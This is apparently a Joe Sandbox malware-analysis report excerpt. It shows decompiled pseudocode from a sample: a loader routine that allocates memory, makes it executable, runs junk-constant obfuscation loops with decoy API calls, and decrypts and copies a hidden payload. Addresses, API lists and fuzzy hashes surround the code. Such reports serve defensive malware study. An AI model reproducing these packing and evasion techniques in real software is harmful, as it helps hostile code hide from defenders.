                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.394197178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                        • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                        • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 20%
                        			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                        				void* _t10;
                        				void* _t13;
                        				intOrPtr* _t19;
                        				void* _t22;
                        				void* _t25;
                        
                        				_t26 = __eflags;
                        				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                        				_t19 =  *((intOrPtr*)(_t25 + 8));
                        				Sleep(0x1388);
                        				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                        				if(_t13 != 0) {
                        					_push( *((intOrPtr*)(_t25 + 0x14)));
                        					_push( *((intOrPtr*)(_t25 - 4)));
                        					_push(_t13);
                        					_push(_t19); // executed
                        					L00401455(0x60, _t22, __edi); // executed
                        				}
                        				 *_t19(0xffffffff, 0); // executed
                        				_t19 = _t19 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                        				_pop(__edi);
                        				_pop(__esi);
                        				_pop(__ebx);
                        				__esp = __ebp;
                        				_pop(__ebp);
                        				return __eax;
                        			}








                        0x00401834
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x00401899
                        0x0040189e
                        0x0040189f
                        0x004018a0
                        0x004018a1
                        0x004018a1
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.394197178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_400000_ikNC1JE7rY.jbxd
                        Similarity
                        • API ID: ProcessSleepTerminate
                        • String ID:
                        • API String ID: 417527130-0
                        • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                        • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                        • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 78%
                        			E00405A6B(void* __fp0) {
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t596;
                        				long _t600;
                        				void* _t603;
                        				struct HINSTANCE__* _t608;
                        				intOrPtr _t613;
                        				intOrPtr* _t623;
                        				intOrPtr* _t643;
                        				intOrPtr* _t645;
                        				intOrPtr* _t648;
                        				void* _t783;
                        				void* _t785;
                        				void* _t788;
                        				void* _t797;
                        				signed int _t799;
                        				long _t800;
                        				void* _t845;
                        				void* _t848;
                        				void* _t849;
                        				void* _t850;
                        				intOrPtr* _t855;
                        				void* _t857;
                        				intOrPtr* _t858;
                        				long _t869;
                        				void* _t871;
                        				void* _t883;
                        
                        				_t883 = __fp0;
                        				_t858 = _t857 - 0x74;
                        				E00407168(E004176DE, _t855);
                        				E00406B10(0x1708);
                        				 *0x42e648 =  *0x41b80c; // executed
                        				_t596 = GlobalAlloc(0,  *0x42e644); // executed
                        				 *0x42dc24 = _t596;
                        				VirtualProtect(_t596,  *0x42e644, 0x40, _t855 + 0x70); // executed
                        				_t845 = 0;
                        				while(1) {
                        					GetLastError();
                        					if(_t845 < 0x129adee) {
                        						 *((intOrPtr*)(_t855 + 0x48)) = 0x16b700e0;
                        						 *((intOrPtr*)(_t855 - 0xa4)) = 0x729fb588;
                        						 *((intOrPtr*)(_t855 + 0x34)) = 0x77dc540a;
                        						 *((intOrPtr*)(_t855 + 0x68)) = 0x3cce353c;
                        						 *((intOrPtr*)(_t855 + 0x10)) = 0x7e9bacb0;
                        						 *((intOrPtr*)(_t855 - 0x9c)) = 0x1db2bd3d;
                        						 *((intOrPtr*)(_t855 - 0x84)) = 0x20627d21;
                        						 *((intOrPtr*)(_t855 - 0x1c)) = 0x3f6ac131;
                        						 *((intOrPtr*)(_t855 - 0x58)) = 0x4429947a;
                        						 *((intOrPtr*)(_t855 - 0x18)) = 0x5a1efe77;
                        						 *((intOrPtr*)(_t855 - 0x48)) = 0x4f98a507;
                        						 *((intOrPtr*)(_t855 - 0x10)) = 0x132dd8ea;
                        						 *((intOrPtr*)(_t855 - 0x68)) = 0x3c255f10;
                        						 *((intOrPtr*)(_t855 + 0x3c)) = 0x36416eaf;
                        						 *((intOrPtr*)(_t855 - 0x8c)) = 0xe14f715;
                        						 *((intOrPtr*)(_t855 - 0x6c)) = 0x7d5c34bd;
                        						 *((intOrPtr*)(_t855 + 0x44)) = 0x28df196a;
                        						 *((intOrPtr*)(_t855 + 0x18)) = 0x37dcb12c;
                        						 *((intOrPtr*)(_t855 - 0x3c)) = 0x72fc7d09;
                        						 *((intOrPtr*)(_t855 + 0x60)) = 0x5147c96c;
                        						 *(_t855 - 0x90) = 0x704b32f3;
                        						 *((intOrPtr*)(_t855 + 0x38)) = 0x5f8f1819;
                        						 *((intOrPtr*)(_t855 + 0x50)) = 0x27a76e55;
                        						 *((intOrPtr*)(_t855 - 0x40)) = 0x22fa090;
                        						 *((intOrPtr*)(_t855 - 0x38)) = 0x670e8118;
                        						 *((intOrPtr*)(_t855 + 4)) = 0xe01cd9b;
                        						 *((intOrPtr*)(_t855 - 0x30)) = 0x3c082c18;
                        						 *((intOrPtr*)(_t855 - 0xa8)) = 0x3ecf8779;
                        						 *(_t855 + 0x6c) = 0x3686b744;
                        						 *((intOrPtr*)(_t855 - 0x28)) = 0x38c96a6e;
                        						 *((intOrPtr*)(_t855 + 8)) = 0x1dd9dcf9;
                        						 *((intOrPtr*)(_t855 + 0xc)) = 0x3f99f2e3;
                        						 *((intOrPtr*)(_t855 - 0x98)) = 0x76152ab6;
                        						 *((intOrPtr*)(_t855 - 0x44)) = 0x35d35e74;
                        						 *((intOrPtr*)(_t855 - 0x74)) = 0x7f54c16b;
                        						 *((intOrPtr*)(_t855 + 0x14)) = 0x3ed4b651;
                        						 *((intOrPtr*)(_t855 + 0x28)) = 0x626e8506;
                        						 *((intOrPtr*)(_t855 - 0x2c)) = 0x5edd1c6f;
                        						 *((intOrPtr*)(_t855 - 0x5c)) = 0x7467e854;
                        						 *((intOrPtr*)(_t855 + 0x40)) = 0x678283b1;
                        						 *((intOrPtr*)(_t855 + 0x1c)) = 0x7774bd03;
                        						 *((intOrPtr*)(_t855 + 0x4c)) = 0x34eec2c0;
                        						 *((intOrPtr*)(_t855 + 0x58)) = 0x23ee5613;
                        						 *((intOrPtr*)(_t855 - 0xa0)) = 0x7710f6f;
                        						 *((intOrPtr*)(_t855 - 0x54)) = 0x4aa513f0;
                        						 *((intOrPtr*)(_t855 - 0x14)) = 0x14c03604;
                        						 *((intOrPtr*)(_t855 - 0x50)) = 0x709d39b2;
                        						 *((intOrPtr*)(_t855 - 0x88)) = 0x2d9fc390;
                        						 *((intOrPtr*)(_t855 - 0x4c)) = 0xdc26664;
                        						 *((intOrPtr*)(_t855 - 0x60)) = 0xef0aa3c;
                        						 *((intOrPtr*)(_t855 - 0x7c)) = 0x59d10e2f;
                        						 *((intOrPtr*)(_t855 - 0x80)) = 0xdb5b201;
                        						 *((intOrPtr*)(_t855 - 0x64)) = 0x3d00c619;
                        						 *((intOrPtr*)(_t855 - 0x34)) = 0x2ee3cb51;
                        						 *((intOrPtr*)(_t855 - 0x78)) = 0x5c1ad1e2;
                        						 *((intOrPtr*)(_t855 + 0x74)) = 0x6d5a82ad;
                        						 *((intOrPtr*)(_t855 + 0x24)) = 0x6415b55c;
                        						 *((intOrPtr*)(_t855 + 0x20)) = 0x43086827;
                        						 *((intOrPtr*)(_t855 + 0x54)) = 0x42d3b3fd;
                        						 *((intOrPtr*)(_t855 + 0x2c)) = 0x8ebf9f3;
                        						 *((intOrPtr*)(_t855 + 0x64)) = 0x3289be56;
                        						 *((intOrPtr*)(_t855 - 0x20)) = 0x198f9d06;
                        						 *((intOrPtr*)(_t855 - 0x24)) = 0x51e34c97;
                        						 *_t855 = 0x3238d997;
                        						 *((intOrPtr*)(_t855 + 0x5c)) = 0x2afa9fe6;
                        						 *((intOrPtr*)(_t855 + 0x30)) = 0x274f0a8c;
                        						 *((intOrPtr*)(_t855 - 0x70)) = 0x5900053b;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x4a11786;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) + 0x4560716b;
                        						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) - 0x72fd1c75;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x2a2e8e8;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x1e649d84;
                        						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) - 0x1adfd311;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x3f0a0b7;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x31fc1696;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x5e14f9c9;
                        						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0xd42e0;
                        						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) - 0x3c18d7b7;
                        						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) - 0x2002a17a;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) + 0x66fa3a6b;
                        						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) + 0x7644be02;
                        						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) - 0x38077f3b;
                        						 *((intOrPtr*)(_t855 - 0x84)) =  *((intOrPtr*)(_t855 - 0x84)) + 0x6861ed43;
                        						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) + 0x2149ea17;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x42dd5e39;
                        						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0x3fde49f0;
                        						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) + 0x24c6ffa8;
                        						 *((intOrPtr*)(_t855 - 0x84)) =  *((intOrPtr*)(_t855 - 0x84)) + 0x1057b77;
                        						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) - 0x49b1f22e;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) + 0x53f6c871;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x31e78741;
                        						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) + 0x3718ba5b;
                        						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) - 0x459675f0;
                        						 *((intOrPtr*)(_t855 - 0x18)) =  *((intOrPtr*)(_t855 - 0x18)) - 0x39fd0a2;
                        						 *((intOrPtr*)(_t855 - 0x48)) =  *((intOrPtr*)(_t855 - 0x48)) + 0x727a9530;
                        						 *((intOrPtr*)(_t855 - 0x48)) =  *((intOrPtr*)(_t855 - 0x48)) - 0x56301dce;
                        						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) - 0x485ad839;
                        						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) - 0x6f733afe;
                        						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) - 0x1acbf0c0;
                        						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) + 0x6bbfcb99;
                        						 *((intOrPtr*)(_t855 - 0x8c)) =  *((intOrPtr*)(_t855 - 0x8c)) + 0x6a615b6a;
                        						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0x403e4fb5;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x5ec62208;
                        						 *((intOrPtr*)(_t855 - 0x68)) =  *((intOrPtr*)(_t855 - 0x68)) + 0x39bcf23a;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x746a7ea9;
                        						 *((intOrPtr*)(_t855 - 0x68)) =  *((intOrPtr*)(_t855 - 0x68)) + 0x1b651608;
                        						 *((intOrPtr*)(_t855 + 0x3c)) =  *((intOrPtr*)(_t855 + 0x3c)) + 0x524f99ee;
                        						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) - 0x76b5296;
                        						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) - 0x1ca732cc;
                        						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) + 0x4a0bd545;
                        						 *((intOrPtr*)(_t855 + 0x18)) =  *((intOrPtr*)(_t855 + 0x18)) - 0x249dac94;
                        						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) - 0x6fb1faa3;
                        						 *((intOrPtr*)(_t855 + 0x50)) =  *((intOrPtr*)(_t855 + 0x50)) - 0x50ecbeb8;
                        						 *(_t855 - 0x90) =  *(_t855 - 0x90) + 0x4d7e5689;
                        						 *((intOrPtr*)(_t855 - 0x68)) =  *((intOrPtr*)(_t855 - 0x68)) + 0x591a883a;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) + 0x78fc8c1e;
                        						 *((intOrPtr*)(_t855 - 0x8c)) =  *((intOrPtr*)(_t855 - 0x8c)) - 0x3ecbf404;
                        						 *((intOrPtr*)(_t855 + 4)) =  *((intOrPtr*)(_t855 + 4)) - 0x6fe1682;
                        						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) + 0x9e116c0;
                        						 *((intOrPtr*)(_t855 + 0x34)) =  *((intOrPtr*)(_t855 + 0x34)) + 0x42f97163;
                        						 *((intOrPtr*)(_t855 + 0x3c)) =  *((intOrPtr*)(_t855 + 0x3c)) - 0x7593f15b;
                        						 *((intOrPtr*)(_t855 - 0x84)) =  *((intOrPtr*)(_t855 - 0x84)) + 0x7eef95db;
                        						 *((intOrPtr*)(_t855 + 0x50)) =  *((intOrPtr*)(_t855 + 0x50)) + 0x6c82abb3;
                        						 *((intOrPtr*)(_t855 + 0x50)) =  *((intOrPtr*)(_t855 + 0x50)) - 0x6508f030;
                        						 *((intOrPtr*)(_t855 - 0x98)) =  *((intOrPtr*)(_t855 - 0x98)) - 0x1c707926;
                        						 *((intOrPtr*)(_t855 + 0x10)) =  *((intOrPtr*)(_t855 + 0x10)) - 0x21ba796a;
                        						 *((intOrPtr*)(_t855 + 0x44)) =  *((intOrPtr*)(_t855 + 0x44)) - 0x495bf23b;
                        						 *((intOrPtr*)(_t855 + 0x18)) =  *((intOrPtr*)(_t855 + 0x18)) + 0x4af4edd1;
                        						 *((intOrPtr*)(_t855 + 0x3c)) =  *((intOrPtr*)(_t855 + 0x3c)) + 0x5367e117;
                        						 *((intOrPtr*)(_t855 - 0x98)) =  *((intOrPtr*)(_t855 - 0x98)) + 0x300e1081;
                        						 *((intOrPtr*)(_t855 + 8)) =  *((intOrPtr*)(_t855 + 8)) + 0x32361f60;
                        						 *((intOrPtr*)(_t855 - 0x44)) =  *((intOrPtr*)(_t855 - 0x44)) - 0x70fde692;
                        						 *((intOrPtr*)(_t855 + 0x48)) =  *((intOrPtr*)(_t855 + 0x48)) - 0x103a5e93;
                        						 *((intOrPtr*)(_t855 - 0x5c)) =  *((intOrPtr*)(_t855 - 0x5c)) + 0x529fcf39;
                        						 *((intOrPtr*)(_t855 + 0x38)) =  *((intOrPtr*)(_t855 + 0x38)) + 0x7c9f7835;
                        						 *((intOrPtr*)(_t855 + 0x14)) =  *((intOrPtr*)(_t855 + 0x14)) - 0x708c25b4;
                        						 *(_t855 - 0x90) =  *(_t855 - 0x90) + 0x36d67e57;
                        						 *((intOrPtr*)(_t855 + 0xc)) =  *((intOrPtr*)(_t855 + 0xc)) - 0x57fb3c02;
                        						 *((intOrPtr*)(_t855 + 0x40)) =  *((intOrPtr*)(_t855 + 0x40)) - 0x3f99fb2a;
                        						 *((intOrPtr*)(_t855 - 0x1c)) =  *((intOrPtr*)(_t855 - 0x1c)) - 0x74f97a90;
                        						 *((intOrPtr*)(_t855 - 0x38)) =  *((intOrPtr*)(_t855 - 0x38)) - 0x17ce5752;
                        						 *((intOrPtr*)(_t855 - 0x4c)) =  *((intOrPtr*)(_t855 - 0x4c)) - 0x4821aa3d;
                        						 *((intOrPtr*)(_t855 + 0x68)) =  *((intOrPtr*)(_t855 + 0x68)) + 0x3a3f3a40;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) - 0x1de8200;
                        						 *((intOrPtr*)(_t855 - 0x8c)) =  *((intOrPtr*)(_t855 - 0x8c)) + 0x6c325c08;
                        						 *((intOrPtr*)(_t855 - 0x34)) =  *((intOrPtr*)(_t855 - 0x34)) + 0x60a345da;
                        						 *((intOrPtr*)(_t855 - 0x5c)) =  *((intOrPtr*)(_t855 - 0x5c)) - 0xc11cad6;
                        						 *((intOrPtr*)(_t855 - 0x88)) =  *((intOrPtr*)(_t855 - 0x88)) - 0x24391f5c;
                        						 *((intOrPtr*)(_t855 + 0x44)) =  *((intOrPtr*)(_t855 + 0x44)) - 0x7643ad89;
                        						 *((intOrPtr*)(_t855 - 0x9c)) =  *((intOrPtr*)(_t855 - 0x9c)) - 0x21db0587;
                        						 *((intOrPtr*)(_t855 - 0xa4)) =  *((intOrPtr*)(_t855 - 0xa4)) + 0x6c6ae23;
                        						 *((intOrPtr*)(_t855 - 0x80)) =  *((intOrPtr*)(_t855 - 0x80)) - 0x17d6899a;
                        						 *((intOrPtr*)(_t855 - 0x34)) =  *((intOrPtr*)(_t855 - 0x34)) + 0x4749c337;
                        						 *((intOrPtr*)(_t855 - 0x4c)) =  *((intOrPtr*)(_t855 - 0x4c)) + 0x4dd6c6ef;
                        						 *((intOrPtr*)(_t855 + 0x14)) =  *((intOrPtr*)(_t855 + 0x14)) + 0x402e7a02;
                        						 *((intOrPtr*)(_t855 - 0x10)) =  *((intOrPtr*)(_t855 - 0x10)) + 0x4d6aa82;
                        						_t799 = 0x74d17c3e *  *(_t855 + 0x6c) >> 0x20;
                        						__imp__GetProcessHandleCount(0, 0); // executed
                        					}
                        					GetSystemDefaultLCID();
                        					if(_t845 > 0x12a82b5) {
                        						break;
                        					}
                        					_t845 = _t845 + 1;
                        					if(_t845 < 0x17c462e4) {
                        						continue;
                        					}
                        					break;
                        				}
                        				_t865 =  *0x42e644 - 0x16;
                        				if( *0x42e644 == 0x16) {
                        					GetVersionExW(0);
                        					GetComputerNameA(_t855 - 0x4c4, _t855 - 0x90);
                        					GlobalWire(_t855 - 0xf14);
                        					ResetEvent(0);
                        					OpenWaitableTimerA(0, 0, "padumojerupodivufojonabahusemufikeserivifaleb");
                        					FindNextFileW(0, _t855 - 0x714);
                        					 *((intOrPtr*)(_t855 - 0xac)) = 0xf;
                        					E004058A2(_t855 - 0xc4, 0);
                        					 *(_t855 - 4) = 0;
                        					E0040753F(_t783, 0, "0.txt", "rb");
                        					E00407447(0);
                        					_pop(_t797);
                        					_t643 = _t858;
                        					 *_t643 = 0;
                        					 *((intOrPtr*)(_t643 + 4)) = 0;
                        					E0040556F(_t883);
                        					st0 = _t883;
                        					_t645 = _t858;
                        					 *_t645 = 0;
                        					 *((intOrPtr*)(_t645 + 4)) = 0;
                        					E0040554C(_t883, _t797, _t797);
                        					st0 = _t883;
                        					E004072E8(_t783, _t799, 1, 0, _t865);
                        					_t648 = _t858;
                        					 *_t648 = 0;
                        					 *((intOrPtr*)(_t648 + 4)) = 0;
                        					E00405529(_t883, _t797, 0);
                        					st0 = _t883;
                        					 *(_t855 - 4) =  *(_t855 - 4) | 0xffffffff;
                        					E004058C7(_t855 - 0xc4, 1, _t855, 1, 0);
                        				}
                        				_t867 =  *0x42e644 - 0xc;
                        				if( *0x42e644 == 0xc) {
                        					__imp__OleQueryCreateFromData();
                        					__imp__WinHttpCloseHandle();
                        					FoldStringW(0, L"miputuwudukabocayuvehom", 0, _t855 - 0xf14, 0);
                        					E00407447(0);
                        					E004072A3(0, 0);
                        					_t623 = _t858;
                        					 *_t623 = 0;
                        					 *((intOrPtr*)(_t623 + 4)) = 0;
                        					E00405529(_t883, 0, 0);
                        					st0 = _t883;
                        					_push(0);
                        					_push(0);
                        					E00407187(_t783, _t799, 1, 0, _t867);
                        					E004059C4(_t855 - 0xc0);
                        					 *(_t855 - 4) = 1;
                        					E00405931(_t855 - 0x94,  *((intOrPtr*)(_t855 - 0xb4)), _t855 - 0xc0);
                        					 *(_t855 - 4) =  *(_t855 - 4) | 0xffffffff;
                        					E00405A3C(_t855 - 0xc0);
                        				}
                        				_t848 = 0;
                        				_t869 =  *0x42e644; // 0xf790
                        				if(_t869 > 0) {
                        					do {
                        						_t613 =  *0x42e648; // 0x36a035
                        						 *((intOrPtr*)(_t855 + 0x74)) = _t613;
                        						 *((intOrPtr*)(_t855 + 0x74)) =  *((intOrPtr*)(_t855 + 0x74)) + 0xb2d3b;
                        						_t788 =  *0x42dc24; // 0x6ef814
                        						 *((char*)(_t848 + _t788)) =  *((intOrPtr*)( *((intOrPtr*)(_t855 + 0x74)) + _t848));
                        						if( *0x42e644 == 0x44) {
                        							__imp__GetLongPathNameA(0, _t855 - 0x4c4, 0);
                        							CreateMutexA(0, 0, 0);
                        						}
                        						_t848 = _t848 + 1;
                        						_t871 = _t848 -  *0x42e644; // 0xf790
                        					} while (_t871 < 0);
                        				}
                        				_t849 = 0;
                        				do {
                        					_t600 =  *0x42e644; // 0xf790
                        					if(_t600 + _t849 == 0x5e) {
                        						SetConsoleCtrlHandler(0, 0);
                        						AddAtomW(L"Nalid cinunec");
                        						lstrcpynA(_t855 - 0x4c4, 0, 0);
                        						__imp__SetFileShortNameW(0, L"bawum");
                        					}
                        					_t849 = _t849 + 1;
                        				} while (_t849 < 0x40c893);
                        				_t800 =  *0x42e644; // 0xf790
                        				_t785 =  *0x42dc24; // 0x6ef814
                        				E0040573C(_t785, _t800, 0x419008);
                        				_t603 = 0;
                        				do {
                        					if(_t603 == 0x770e) {
                        						 *((intOrPtr*)(_t855 + 0x74)) = 0;
                        						 *((intOrPtr*)(_t855 + 0x74)) =  *((intOrPtr*)(_t855 + 0x74)) + 0x3afc;
                        						 *0x42dc24 =  *0x42dc24 +  *((intOrPtr*)(_t855 + 0x74));
                        					}
                        					_t603 = _t603 + 1;
                        				} while (_t603 < 0x286b97d);
                        				_t850 = 0x7b;
                        				do {
                        					if( *0x42e644 == 0xd) {
                        						GetFileType(0);
                        						FindFirstChangeNotificationW(0, 0, 0);
                        					}
                        					if( *0x42e644 == 0xf) {
                        						__imp__GetConsoleAliasW(0, _t855 - 0x1714, 0, 0);
                        						GetUserDefaultLangID();
                        					}
                        					_t850 = _t850 - 1;
                        				} while (_t850 != 0);
                        				_t608 = LoadLibraryA("msimg32.dll");
                        				 *[fs:0x0] =  *((intOrPtr*)(_t855 - 0xc));
                        				return _t608;
                        			}































                        0x00405a6b
                        0x00405a6c
                        0x00405a74
                        0x00405a7e
                        0x00405a93
                        0x00405a98
                        0x00405aaa
                        0x00405ab0
                        0x00405ab6
                        0x00405ab8
                        0x00405ab8
                        0x00405ac4
                        0x00405aca
                        0x00405ad1
                        0x00405adb
                        0x00405ae2
                        0x00405ae9
                        0x00405af0
                        0x00405afa
                        0x00405b04
                        0x00405b0b
                        0x00405b12
                        0x00405b19
                        0x00405b20
                        0x00405b27
                        0x00405b2e
                        0x00405b35
                        0x00405b3f
                        0x00405b46
                        0x00405b4d
                        0x00405b54
                        0x00405b5b
                        0x00405b62
                        0x00405b6c
                        0x00405b73
                        0x00405b7a
                        0x00405b81
                        0x00405b88
                        0x00405b8f
                        0x00405b96
                        0x00405ba0
                        0x00405ba7
                        0x00405bae
                        0x00405bb5
                        0x00405bbc
                        0x00405bc6
                        0x00405bcd
                        0x00405bd4
                        0x00405bdb
                        0x00405be2
                        0x00405be9
                        0x00405bf0
                        0x00405bf7
                        0x00405bfe
                        0x00405c05
                        0x00405c0c
                        0x00405c16
                        0x00405c1d
                        0x00405c24
                        0x00405c2b
                        0x00405c35
                        0x00405c3c
                        0x00405c43
                        0x00405c4a
                        0x00405c51
                        0x00405c58
                        0x00405c5f
                        0x00405c66
                        0x00405c6d
                        0x00405c74
                        0x00405c7b
                        0x00405c82
                        0x00405c89
                        0x00405c90
                        0x00405c97
                        0x00405c9e
                        0x00405ca5
                        0x00405cac
                        0x00405cb3
                        0x00405cba
                        0x00405cc1
                        0x00405cde
                        0x00405cf0
                        0x00405cf7
                        0x00405d09
                        0x00405d21
                        0x00405d2b
                        0x00405d35
                        0x00405d3f
                        0x00405d62
                        0x00405d69
                        0x00405d7b
                        0x00405d85
                        0x00405d8f
                        0x00405db2
                        0x00405dbc
                        0x00405dc3
                        0x00405dd5
                        0x00405ddc
                        0x00405dee
                        0x00405df8
                        0x00405dff
                        0x00405e06
                        0x00405e34
                        0x00405e3e
                        0x00405e56
                        0x00405e5d
                        0x00405e7a
                        0x00405e81
                        0x00405e93
                        0x00405e9a
                        0x00405ea1
                        0x00405eb3
                        0x00405ebd
                        0x00405eeb
                        0x00405ef5
                        0x00405efc
                        0x00405f06
                        0x00405f0d
                        0x00405f14
                        0x00405f26
                        0x00405f30
                        0x00405f48
                        0x00405f4f
                        0x00405f56
                        0x00405f5d
                        0x00405f67
                        0x00405f6e
                        0x00405f78
                        0x00405f82
                        0x00405f89
                        0x00405f90
                        0x00405f97
                        0x00405f9e
                        0x00405fa8
                        0x00405faf
                        0x00405fb6
                        0x00405fd6
                        0x00405fdd
                        0x00405fe4
                        0x00405feb
                        0x00405ff2
                        0x00405ffc
                        0x00406003
                        0x0040600a
                        0x00406027
                        0x0040602e
                        0x00406040
                        0x00406047
                        0x00406051
                        0x00406058
                        0x00406075
                        0x0040607c
                        0x0040608e
                        0x00406095
                        0x0040609c
                        0x004060a6
                        0x004060b0
                        0x004060b7
                        0x004060c9
                        0x004060d3
                        0x004060da
                        0x004060fa
                        0x00406104
                        0x00406132
                        0x00406139
                        0x00406140
                        0x00406152
                        0x0040617f
                        0x00406187
                        0x00406187
                        0x0040618d
                        0x00406199
                        0x00000000
                        0x00000000
                        0x0040619b
                        0x004061a2
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004061a2
                        0x004061ab
                        0x004061b2
                        0x004061b9
                        0x004061cd
                        0x004061da
                        0x004061e1
                        0x004061ee
                        0x004061fc
                        0x00406209
                        0x00406213
                        0x00406223
                        0x00406226
                        0x0040622c
                        0x00406232
                        0x00406233
                        0x00406235
                        0x00406237
                        0x0040623a
                        0x0040623f
                        0x00406243
                        0x00406245
                        0x00406247
                        0x0040624a
                        0x0040624f
                        0x00406252
                        0x00406258
                        0x0040625a
                        0x0040625c
